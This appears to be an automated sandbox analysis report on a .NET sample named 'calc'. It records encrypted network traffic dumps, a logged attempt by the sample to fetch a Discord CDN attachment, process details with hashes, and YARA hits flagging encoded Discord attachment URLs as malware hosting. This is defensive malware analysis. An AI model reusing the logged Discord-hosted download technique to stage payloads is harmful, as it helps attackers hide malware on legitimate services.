                                                                                                                                                                        2021-10-28 02:56:06 UTC820INData Raw: a4 c2 ba c2 97 c2 ab c3 a5 c3 97 c3 86 c3 8f c3 aa c3 8b c3 85 c3 99 c3 91 c3 9d c3 a7 c3 ad c3 88 c2 8b c2 8c c2 87 c3 a7 c3 87 c3 96 c3 9f c3 ba c3 9f c3 9a c3 8a c3 94 c3 89 c3 91 c3 9f c3 9b 64 4b 79 1d 41 30 29 1e 37 2c 2f 25 3e 23 29 3a 60 62 60 04 51 30 30 08 40 43 2e 25 5f 20 2c 3a 40 52 50 24 10 07 0c 2b 04 04 1a 10 1a 26 2e 09 54 4d 44 26 07 6f 1b 2f 14 32 0e 00 1e 10 1c 2f 29 39 08 5f 66 13 1d 5c 79 64 54 47 58 63 69 7a 20 22 20 41 66 0f 57 43 66 42 66 6d 78 7c 57 4a 06 66 3d 64 50 47 4c 6b 44 44 29 67 71 48 64 79 2f 11 15 6f 59 5c 2f 5b 46 54 64 55 4e 50 4c 51 c3 a9 c3 b9 c2 83 c2 a4 c2 a6 c2 a8 c2 81 c2 a9 c2 96 c2 ab c2 b9 c2 a5 c2 be c2 a0 c2 be c2 98 c2 93 c3 b5 c3 98 c2 b6 c2 96 c2 b7 c2 bc c2 9b c2 b0 c2 bb c2 a9 c2 b5 c2 ae c2 b0 c2 bc
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                                                                                                                                                                        2021-10-28 02:56:06 UTC836INData Raw: bc c2 ba c2 b8 c2 be c3 8a c3 ba c3 ad c3 ba c3 9d c3 be c3 be c3 90 c3 9e c3 b2 c3 80 c3 95 c3 8f c2 82 c2 8d c3 9f c3 92 c3 ac c3 90 c3 be c3 88 c3 8c c3 96 c3 af c3 a9 c3 9d c3 82 c3 a2 c3 b9 c2 98 c2 9b c3 af c3 8a c3 9c c3 99 c3 bc c3 b1 c3 b1 c3 99 c2 b5 c3 96 c3 9d c3 92 c3 b2 c3 ae c3 b8 c2 8b c2 b9 c3 99 c3 a5 2d 06 0e 2b 26 36 28 35 25 3b 1f 08 52 49 01 39 25 4b 13 13 21 56 35 0d 21 4e 22 43 78 1f 11 2d 19 3c 0c 23 05 3c 10 0c 15 27 17 5d 50 68 0a 37 66 36 26 69 05 37 3b 76 63 2c 07 42 44 62 34 12 75 50 55 79 66 5b 4a 4d 65 5f 5c 14 30 4e 52 6d 75 51 5c 5d 76 66 78 65 76 7e 6f 2b 2f 2f 52 72 56 7f 65 52 52 62 43 4c 52 7a 54 02 0b 1f 69 5b 52 5b 7e 5f 5d 6f 43 47 55 4e 5f 1c 00 19 74 3a c2 b5 c2 bb c2 9a c3 9b c2 be c2 90 c2 8a c2 99 c2 b1 c2 95
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                                                                                                                                                                        2021-10-28 02:56:06 UTC852INData Raw: 81 c3 85 c3 85 c3 85 c2 bf c2 8d c2 98 c2 91 c2 b0 c2 97 c2 99 c2 9f c3 ad c3 b7 c3 ac c3 a7 c3 b1 c2 b5 c2 b5 c2 b5 c3 8f c3 bd c3 a8 c3 a1 c3 80 c3 a5 c3 ac c3 bc c3 be c3 a3 c3 bc c3 b4 c3 a1 c2 a5 c2 a5 c2 a5 c3 9f c3 ad c3 b8 c3 b1 c3 90 c3 b5 c3 bc c3 ac c3 8e c3 93 c3 8c c3 84 c3 91 c2 95 c2 95 c2 95 c3 af c3 9d c3 88 c3 81 c3 a0 c3 85 c3 8c c3 9c c3 9e c3 83 c3 9c c3 94 c3 81 c2 85 c2 85 c2 85 c3 bf c3 8d c3 98 c3 91 c3 b0 c3 95 c3 9c 33 2f 30 2d 23 30 76 74 7a 0e 3e 29 26 01 26 2d 23 3f 20 3d 33 20 66 64 6a 1e 2e 39 36 11 36 3d 13 0f 10 0d 03 10 56 54 5a 2e 1e 09 06 21 06 0d 03 1f 00 1d 13 00 46 44 4a 3e 0e 19 16 31 16 1d 73 6f 70 6d 63 70 36 34 3a 67 6e 6d 66 41 6e 6d 63 7f 60 7d 73 60 26 24 2a 5e 6e 79 76 51 76 7d 53 4f 50 4d 43 50 16 14 1a 17
                                                                                                                                                                        Data Ascii: 3/0-#0vtz>)&&-#? =3 fdj.966=VTZ.!FDJ>1sopmcp64:gnmfAnmc`}s`&$*^nyvQv}SOPMCP
                                                                                                                                                                        2021-10-28 02:56:06 UTC868INData Raw: b2 c3 86 c2 a6 c3 ba c2 86 c3 a3 c2 ae c2 a5 c2 8b c3 b3 c2 9f c2 bf c2 9e c2 b2 c2 84 c2 b8 c2 b9 c3 86 c3 95 c3 aa c2 be c2 92 c3 a2 c2 ba c2 ae c2 86 c3 a3 c2 b1 c2 8e c2 9c c2 90 c2 b3 c2 91 c2 a9 c2 a1 c2 99 c3 a4 c3 a6 c3 91 c3 8a c3 a8 c3 b6 c3 ac c2 8d c3 ad c3 b8 c3 a8 c3 84 c3 b2 c2 a6 c2 a5 c3 93 c3 8c c3 b6 c3 9a c3 8e c3 83 c3 a6 c3 b0 c3 9b c3 ae c3 bc c3 b0 c3 88 c3 89 c2 b8 c2 91 c3 a1 c3 84 c3 96 c3 93 c3 aa c3 bc c2 b3 c3 a6 c3 ad c3 9e c3 98 c2 bb c2 bb c3 b8 c2 b8 c2 81 c2 95 c3 90 c3 99 c3 98 c2 ad c3 a0 c3 86 c2 aa c3 af c3 8e c3 97 c3 88 c3 b4 16 5e 61 57 20 37 5c 02 09 07 28 38 22 3f 20 28 25 61 61 61 18 38 38 1b 1e 34 3b 5d 39 3a 30 4d 03 53 7b 51 23 11 04 0d 24 03 1f 23 0a 1d 71 2e 0e 58 4d 41 26 2d 03 32 17 63 0b 39 0a 16 03 35
                                                                                                                                                                        Data Ascii: ^aW 7\(8"? (%aaa884;]9:0MS{Q#$#q.XMA&-2c95
                                                                                                                                                                        2021-10-28 02:56:06 UTC884INData Raw: 87 c3 bb c3 a4 c3 bf c2 89 c2 ab c2 b2 c2 bb c2 9e c2 bb c2 98 c2 a6 c2 b8 c2 a5 c2 b6 c2 be c2 af c3 ab c3 af c3 af c2 9b c2 ab c2 82 c2 8b c2 ae c2 8b c2 86 c2 96 c2 88 c2 95 c2 83 c2 82 c3 a7 c3 9b c3 84 c3 9f c2 a9 c2 8b c2 92 c2 9b c2 be c2 9b c2 8e c2 86 c2 98 c2 85 c2 96 c2 9e c2 8f c3 8b c3 8f c3 8f c2 bd c2 8b c3 a2 c3 ab c3 8e c3 ab c3 a6 c3 b6 c3 a8 c3 b5 c3 a3 c3 b6 c2 87 c2 bb c2 a4 c2 bf c3 89 c3 ab c3 b2 c3 bb c3 9e c3 bb c3 90 c3 a6 c3 b8 c3 a5 c3 b6 c3 be c3 af c2 ab c2 af c2 af c3 91 c3 ab c3 82 c3 8b c3 ae c3 8b c3 86 c3 96 c3 88 c3 95 c3 85 c3 ac c3 8b c2 ad c2 84 c2 9f c3 a9 c3 8b c3 92 c3 9b c3 be c3 9b c3 86 c3 86 c3 98 c3 85 c3 96 c3 9e c3 8f c2 8b c2 8f c2 8f c3 a9 34 23 28 0f 2c 27 35 29 3a 22 03 46 7c 65 7c 08 34 33 38 1f 3c 15
                                                                                                                                                                        Data Ascii: 4#(,'5):"F|e|438<
                                                                                                                                                                        2021-10-28 02:56:06 UTC900INData Raw: 5a 6f 44 40 49 69 7d 6f 51 53 40 06 04 0a 7a 45 51 5f 71 54 5d c2 bb c2 af c2 b0 c2 ad c2 97 c2 a8 c3 99 c3 bb c3 81 c2 8e c2 be c2 a9 c2 a6 c2 81 c2 a6 c2 af c2 85 c2 bc c2 96 c2 bf c2 81 c2 b1 c3 80 c3 a4 c3 aa c2 93 c2 81 c2 ba c2 9c c2 89 c2 af c2 ae c2 ba c2 8f c2 90 c2 8d c2 83 c3 a5 c3 96 c3 b6 c3 9a c2 b6 c2 9e c2 89 c2 86 c2 a1 c2 84 c3 b9 c2 bb c2 bd c3 b2 c2 96 c2 b8 c2 8b c3 83 c3 84 c3 b3 c2 be c2 8e c2 99 c2 96 c2 b1 c2 90 c2 98 c3 95 c3 ac c3 86 c3 af c3 a3 c3 b0 c2 a6 c2 b4 c2 ba c3 83 c3 91 c3 a2 c3 9d c3 a3 c3 8a c3 a1 c3 89 c3 b3 c3 a5 c3 b5 c3 b3 c3 a0 c2 a6 c2 a4 c2 aa c3 9e c3 ae c3 b9 c3 b6 c3 91 c3 b6 c3 bd c3 93 c3 8f c3 90 c3 8d c3 83 c3 90 c2 96 c2 94 c2 9a c3 ae c3 9e c3 89 c3 86 c3 a1 c3 86 c3 8d c3 83 c3 9f c3 80 c3 9d c3 93
                                                                                                                                                                        Data Ascii: ZoD@Ii}oQS@zEQ_qT]
                                                                                                                                                                        2021-10-28 02:56:06 UTC916INData Raw: 31 13 31 5b 7d 7c 6e 44 68 5f 7e 62 6f 65 1d 68 21 03 21 5b 71 60 7f 54 71 6c 19 71 49 73 0e 6c 37 15 11 4e 73 5c 4e 64 50 7e 63 41 69 40 61 45 01 01 01 57 38 4c 5e 74 5a 41 4e 52 5f 55 21 c2 b9 c3 87 c3 93 c3 b1 c2 8b c2 a1 c2 a4 c2 af c2 84 c2 a1 c2 ab c3 89 c2 a1 c2 89 c2 a3 c2 8e c2 9c c3 87 c3 a5 c3 a1 c2 b7 c3 98 c2 ac c2 be c2 94 c2 a0 c2 9e c2 9a c2 b1 c2 99 c2 b0 c2 a3 c2 92 c3 a7 c3 81 c3 91 c2 a1 c2 9e c2 8c c2 89 c2 86 c2 81 c2 87 c2 be c2 82 c2 b4 c2 83 c3 b9 c2 87 c3 91 c3 99 c3 81 c2 a5 c2 81 c2 94 c2 9d c2 b4 c2 93 c2 9e c2 9a c2 91 c2 a9 c2 92 c2 8a c3 a2 c2 b2 c2 a1 c2 b1 c3 8e c2 9b c3 b4 c3 a2 c3 84 c3 a1 c3 b1 c2 89 c3 a7 c3 bf c3 a2 c3 b8 c3 9d c2 a1 c2 a5 c2 a1 c3 a8 c2 98 c3 92 c3 be c3 94 c3 b5 c3 9e c2 99 c3 b1 c3 99 c3 b0 c3 91
                                                                                                                                                                        Data Ascii: 11[}|nDh_~boeh!![q`TqlqIsl7Ns\NdP~cAi@aEW8L^tZANR_U!
                                                                                                                                                                        2021-10-28 02:56:06 UTC932INData Raw: 3a 2a 34 1f 26 6c 7e 6c 6c 13 0f 01 2f 0e 03 15 09 1a 05 3b 17 6a 4e 5c 31 06 13 1c 3f 12 04 10 1a 3c 17 1e 0c 6a 5e 4c 3a 5f 73 60 4f 6c 49 4d 6a 57 67 44 7d 2c 36 3c 4b 72 63 7e 5f 7c 77 56 7a 6a 77 65 64 1a 3e 2c 51 53 53 41 6f 4e 43 52 49 7c 47 4a 7b 1c 3c 1c 6e 46 61 5c 7f 5e 75 76 5a 4a 57 73 59 0c 2c 0c 70 c2 a4 c2 a3 c2 a8 c2 8f c2 af c2 81 c2 86 c2 aa c2 ba c2 a7 c2 82 c2 b4 c3 8a c3 ae c3 bc c2 82 c2 a3 c2 a3 c2 b1 c2 9f c2 be c2 b3 c2 a5 c2 b9 c2 aa c2 b7 c2 bd c2 a4 c3 9a c3 be c3 ac c2 9e c2 96 c2 b1 c2 8c c2 af c2 8f c2 be c2 81 c2 8a c2 ac c2 87 c2 96 c2 94 c3 8c c3 b4 c3 9c c2 af c3 b7 c2 83 c2 bd c2 bf c2 9f c2 b2 c2 91 c2 90 c2 8a c2 97 c2 84 c2 81 c3 8f c3 bc c3 8c c2 bf c3 82 c3 a7 c3 b0 c3 8f c3 af c3 a4 c3 83 c3 a9 c3 ba c3 a4 c2 9c
                                                                                                                                                                        Data Ascii: :*4&l~ll/;jN\1?<j^L:_s`OlIMjWgD},6<Krc~_|wVzjwed>,QSSAoNCRI|GJ{<nFa\^uvZJWsY,p
                                                                                                                                                                        2021-10-28 02:56:06 UTC948INData Raw: 80 c2 86 c2 84 c2 8a c3 be c3 8e c3 99 c3 96 c3 b1 c3 87 0b 58 2f 07 2a 22 33 77 7b 7b 29 36 5f 2e 02 27 32 22 3c 21 3a 32 04 51 49 6b 1d 2f 3e 37 12 37 75 11 0f 27 0a 02 13 57 5b 5b 3b 30 7b 0e 22 07 12 02 1c 01 19 00 24 61 69 4b 3d 0f 1e 17 32 19 16 18 6f 47 6a 62 73 37 3b 3b 5c 77 6a 6e 42 67 72 62 7c 61 79 76 45 37 09 2b 5d 6f 7e 77 52 73 35 51 4f 67 4a 42 53 17 1b 1b 7b 57 4a 4e 62 47 52 42 5c 41 5f 5c 64 17 29 0b 7d 4f 5e 57 72 5f c3 96 c3 98 c2 af c2 87 c2 aa c2 a2 c2 b3 c3 b7 c3 bb c3 bb c2 bd c2 90 c3 9b c2 ae c2 82 c2 a7 c2 b2 c2 a2 c2 bc c2 a1 c2 bf c2 a4 c2 84 c3 b7 c3 89 c3 ab c2 9d c2 af c2 be c2 b7 c2 92 c2 bf c2 99 c3 b8 c2 8f c2 a7 c2 8a c2 82 c2 93 c3 97 c3 9b c3 9b c2 bd c2 96 c3 bb c2 8e c2 a2 c2 87 c2 92 c2 82 c2 9c c2 81 c2 9a c2 a6
                                                                                                                                                                        Data Ascii: X/*"3w{{)6_.'2"<!:2QIk/>77u'W[[;0{"$aiK=2oGjbs7;;\wjnBgrb|ayvE7+]o~wRs5QOgJBS{WJNbGRB\A_\d)}O^Wr_
                                                                                                                                                                        2021-10-28 02:56:06 UTC964INData Raw: b3 c2 b7 c2 95 c2 91 c3 94 c2 a4 c3 8c c3 8e c3 a4 c3 84 c3 ae c3 ae c3 81 c3 a9 c3 82 c2 a6 c3 a3 c2 a7 c2 85 c2 81 c3 b5 c3 89 c3 98 c3 9e c3 b4 c3 96 c3 88 c3 be c3 91 c3 b9 c3 90 01 12 44 74 76 12 47 29 21 05 22 39 08 20 0a 22 32 02 54 64 66 63 57 39 31 15 31 39 18 30 1a 34 12 32 64 54 56 56 67 09 01 25 00 19 28 00 2a 04 38 22 74 44 46 58 2c 19 11 35 17 3f 38 10 3a 11 67 5d 32 34 36 45 07 75 61 45 66 5f 4a 60 4a 61 6e 4d 22 24 26 4b 6a 65 71 55 76 5f 58 70 5a 72 65 7d 12 14 16 79 27 55 41 65 45 7f 68 40 6a 43 57 6d 02 04 06 02 37 73 51 75 5a 49 7b 50 7a 54 c2 91 c2 9c c3 b2 c3 b4 c3 b6 c3 ac c2 b9 c2 b1 c2 a1 c2 85 c2 a4 c2 b9 c2 89 c2 a0 c2 8a c2 a1 c2 b7 c2 89 c3 84 c3 a4 c3 a6 c2 97 c3 96 c2 ad c2 b1 c2 95 c2 bb c2 a9 c2 96 c2 b0 c2 9a c2 b1 c2 96
                                                                                                                                                                        Data Ascii: DtvG)!"9 "2TdfcW9119042dTVVg%(*8"tDFX,5?8:g]246EuaEf_J`JanM"$&KjeqUv_XpZre}y'UAeEh@jCWm7sQuZI{PzT
                                                                                                                                                                        2021-10-28 02:56:06 UTC980INData Raw: af c2 ac c2 ae c2 bc c3 bd c3 a1 c2 86 c3 bc c3 9f c3 b7 c3 a7 c3 b1 c3 ba c3 9c c3 b2 c3 bd c3 bf c2 8a c2 be c2 ac c2 a0 c3 af c2 b6 c3 8c c3 af c3 87 c3 97 c3 81 c3 8a c3 ac c3 87 c3 8d c3 8f c2 aa c2 8e c2 9c c2 9d c3 90 c3 97 c3 9c c3 bf c3 99 c3 97 c3 92 c3 9a c3 bc c3 92 c3 ab c3 9e c2 9c c2 9e c2 8c 12 21 28 2d 08 26 34 20 25 0d 27 3c 29 5b 6d 7d 2c 31 3c 3d 18 3a 24 4e 35 1d 31 2c 39 5b 7d 6d 2a 64 10 0d 28 06 14 00 05 2d 06 1c 0a 5d 4d 5d 24 11 08 1d 38 0c 2d 10 15 3d 17 0c 1a 6b 5d 4d 51 61 46 6d 48 65 4d 72 65 4d 67 4a 6b 3d 2d 3d 21 71 56 7d 58 78 74 73 75 5d 71 4a 7b 2d 3d 2d 77 52 44 4d 68 40 6d 40 45 6d 47 4c 4d 0d 0d 1d 5d 52 54 5d 78 56 44 50 55 7d 56 7a 5d 1d 1d 0d c3 b6 c2 a2 c2 a8 c2 ad c2 88 c2 a6 c2 b4 c2 a0 c2 a5 c2 8d c2 a1 c2 8a
                                                                                                                                                                        Data Ascii: !(-&4 %'<)[m},1<=:$N51,9[}m*d(-]M]$8-=k]MQaFmHeMreMgJk=-=!qV}Xxtsu]qJ{-=-wRDMh@m@EmGLM]RT]xVDPU}Vz]

                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                        2021-10-28 02:56:06 UTC994OUTGET /attachments/897223707649515602/897228595318124554/ascii_ART.txt HTTP/1.1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
                                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                                        2021-10-28 02:56:06 UTC994INHTTP/1.1 403 Forbidden
                                                                                                                                                                        Date: Thu, 28 Oct 2021 02:56:06 GMT
                                                                                                                                                                        Content-Type: application/xml; charset=UTF-8
                                                                                                                                                                        Content-Length: 223
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                                                                                                                                                                        CF-Ray: 6a50e397b8ab1756-FRA
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                                                                                                                                                                        Expires: Thu, 28 Oct 2021 02:56:06 GMT
                                                                                                                                                                        Vary: Accept-Encoding
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                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
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                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X0aOWmo3%2Bd2J5p5kYEmgATNoxtwSQamhuDwF0HfeVv3A%2FULL0goDlzj8myWfYgoN8Wz%2BTegRCRL%2FE6v2%2BH8q99WsdaRWi95pVvtRlzG%2F%2B%2BEfjTXgU25DZRc%2Botur%2FhsNBmyD9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        2021-10-28 02:56:06 UTC995INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 41 63 63 65 73 73 44 65 6e 69 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 41 6e 6f 6e 79 6d 6f 75 73 20 63 61 6c 6c 65 72 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 73 74 6f 72 61 67 65 2e 6f 62 6a 65 63 74 73 2e 67 65 74 20 61 63 63 65 73 73 20 74 6f 20 74 68 65 20 47 6f 6f 67 6c 65 20 43 6c 6f 75 64 20 53 74 6f 72 61 67 65 20 6f 62 6a 65 63 74 2e 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                                                                                                        Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>AccessDenied</Code><Message>Access denied.</Message><Details>Anonymous caller does not have storage.objects.get access to the Google Cloud Storage object.</Details></Error>

                                                                                                                                                                        Code Manipulations


                                                                                                                                                                        CPU Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Memory Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                        Click to dive into process behavior distribution


                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior


                                                                                                                                                                        Start time:04:56:03
                                                                                                                                                                        Start date:28/10/2021
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        File size:192000 bytes
                                                                                                                                                                        MD5 hash:CE76AE9D476B9C0DAA25DAF4C6DD4909
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.252642988.0000000000322000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000002.291985012.0000000000322000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.245005606.0000000000322000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.253313788.00000000026D3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000002.293201383.0000000002677000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.254525892.0000000002677000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.254621493.00000000026D3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000002.293367777.00000000026D3000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.253884839.0000000000322000.00000002.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000000.00000000.253255248.0000000002677000.00000004.00000001.sdmp, Author: Florian Roth


                                                                                                                                                                        Start time:04:56:03
                                                                                                                                                                        Start date:28/10/2021
                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                        File size:625664 bytes
                                                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:C, C++ or other language


                                                                                                                                                                        Start time:04:56:09
                                                                                                                                                                        Start date:28/10/2021
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 2104
                                                                                                                                                                        File size:434592 bytes
                                                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                                                        Yara matches:
                                                                                                                                                                        • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000005.00000002.291489220.0000000005750000.00000004.00000001.sdmp, Author: Florian Roth


                                                                                                                                                                        Code Analysis

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Executed Functions

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: e3c6efa4bdb7f09885f92b426cd8ffd144edbb1982f33219c4e52ca1c4a9661c
                                                                                                                                                                          • Instruction ID: 8d9662c6f07bc8dea5b160ddd620defd336bdf3eef7c635507f4a79a10341ae2
                                                                                                                                                                          • Opcode Fuzzy Hash: e3c6efa4bdb7f09885f92b426cd8ffd144edbb1982f33219c4e52ca1c4a9661c
                                                                                                                                                                          • Instruction Fuzzy Hash: ACE0461240E7D88FE70347B81C29AD97F305F23004F1A82EBC0C6CB4A3C904484AC723

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 70625aab6061559fda08c2a0a132f6bece0b51b14dff1a8bb0b31aec0969cfe0
                                                                                                                                                                          • Instruction ID: d88a9660ae615d33bb0f7bd7f8b34e781de449cfc944bed9cdc9207cd8db6517
                                                                                                                                                                          • Opcode Fuzzy Hash: 70625aab6061559fda08c2a0a132f6bece0b51b14dff1a8bb0b31aec0969cfe0
                                                                                                                                                                          • Instruction Fuzzy Hash: 2651A1706142048FCB14EBA9D858BAEBBE6EF89314F20842DE116D7755CB349C41CB65

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2e29ec935eecd72fe319b7331509c3194e692a2f67079694ed12de4675dd793e
                                                                                                                                                                          • Instruction ID: 4e186e0688d5628c3cdb555abb5497ad2e48e750d9cbb20ba9198eb15288a705
                                                                                                                                                                          • Opcode Fuzzy Hash: 2e29ec935eecd72fe319b7331509c3194e692a2f67079694ed12de4675dd793e
                                                                                                                                                                          • Instruction Fuzzy Hash: FF4191307142448FDB28AB78D868A6E77E7AFC5304B21882DE116CB7A9CF349C42DB55

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292414204.000000000081D000.00000040.00000001.sdmp, Offset: 0081D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_81d000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a3d16fe10f4d17c4529169025a3078e6519629134bb0454bab8bc47a200d2bae
                                                                                                                                                                          • Instruction ID: fc3b770c9cd9f0f75fdd14295c733d4b4bea7414091c060eb90b6c4328ea5356
                                                                                                                                                                          • Opcode Fuzzy Hash: a3d16fe10f4d17c4529169025a3078e6519629134bb0454bab8bc47a200d2bae
                                                                                                                                                                          • Instruction Fuzzy Hash: 2321F4B1500344DFCB05CF54D9C0B97BF6AFF88328F248569E8058B246C336D895D7A1

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292414204.000000000081D000.00000040.00000001.sdmp, Offset: 0081D000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_81d000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ef7a133de0c3e575db5bfdc0187ee935f71944654d1038099ce1d03a88d098f9
                                                                                                                                                                          • Instruction ID: 912b0d6152eecfb618fa51c31dc9b003e6fe586503551806b71c85ee6236fdf4
                                                                                                                                                                          • Opcode Fuzzy Hash: ef7a133de0c3e575db5bfdc0187ee935f71944654d1038099ce1d03a88d098f9
                                                                                                                                                                          • Instruction Fuzzy Hash: DE2108B1500344DFDB05DF50D9C0BA7BB69FF94328F24C569D9058B246C336E896C7A5

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.292828721.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_calc.jbxd
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ebb27c961aba990e942a73ba611d49f965c0d0b08a1fbdb30b14eb7aeddd7802
                                                                                                                                                                          • Instruction ID: 0facdaac4c1b2ec9631dd2ccb3515bfe0499baa74bde0ab94a9f6a0405885e5b
